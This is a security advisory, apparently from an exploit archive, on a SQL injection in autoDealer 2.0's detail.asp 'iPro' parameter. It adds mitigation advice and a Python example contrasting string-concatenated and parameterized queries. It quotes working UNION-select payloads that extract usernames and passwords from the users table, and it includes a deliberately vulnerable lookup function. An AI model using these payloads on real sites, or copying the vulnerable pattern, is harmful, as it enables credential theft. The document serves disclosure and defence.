Vendor: autoDealer
By: ajann
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: autoDealer
Affected Version From: autoDealer <= 2.0
Affected Version To: autoDealer <= 2.0
Patch Exists: NO
Platforms Tested: Unknown
2007

autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

autoDealer version 2.0 is vulnerable to remote SQL injection through the 'iPro' parameter of the 'detail.asp' page. An attacker can inject SQL code into this parameter to manipulate the SQL query and retrieve sensitive information from the database. An example payload is 'detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users'.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users can mitigate the risk by implementing input validation and parameterized queries to prevent SQL injection attacks.
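
An added example, not code from the advisory or from autoDealer: the same record lookup written with string concatenation and then with input validation plus a bound parameter. The table layout, function names and sample rows are assumptions constructed for illustration, and Python with sqlite3 stands in for the ASP application's database access.

```python
import sqlite3


def make_db():
    """Constructed stand-in schema; the real autoDealer tables are not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, make TEXT, model TEXT, price INTEGER);
        CREATE TABLE users (U_ACCESS TEXT, U_PASSWORD TEXT);
        INSERT INTO products VALUES (1, 'Saab', '900', 4500);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db


def detail_concatenated(db, ipro):
    # Weak pattern: the raw query-string value becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT id, make, model, price FROM products WHERE id = " + ipro
    return db.execute(sql).fetchall()


def parse_ipro(raw):
    # Input validation: iPro is a record id, so accept only a short run of
    # ASCII digits and reject everything else before touching the database.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("iPro must be a positive integer")
    return int(raw)


def detail_parameterized(db, ipro):
    # Parameterized query: the value is bound as data and never parsed as SQL.
    sql = "SELECT id, make, model, price FROM products WHERE id = ?"
    return db.execute(sql, (parse_ipro(ipro),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # URL-decoded form of the value quoted in the advisory.
    quoted = "-1 union select 0,0,U_ACCESS,0 from users"
    print("concatenated :", detail_concatenated(db, quoted))
    try:
        detail_parameterized(db, quoted)
    except ValueError as err:
        print("parameterized: rejected,", err)
    print("parameterized:", detail_parameterized(db, "1"))
```

Binding the parameter is the control that removes the injection; the digit check is defence in depth and gives a clean rejection point to log.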

Exploit-DB raw data:

*******************************************************************************
# Title   :  autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspsiteware.com
# $$      :  $60.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-01]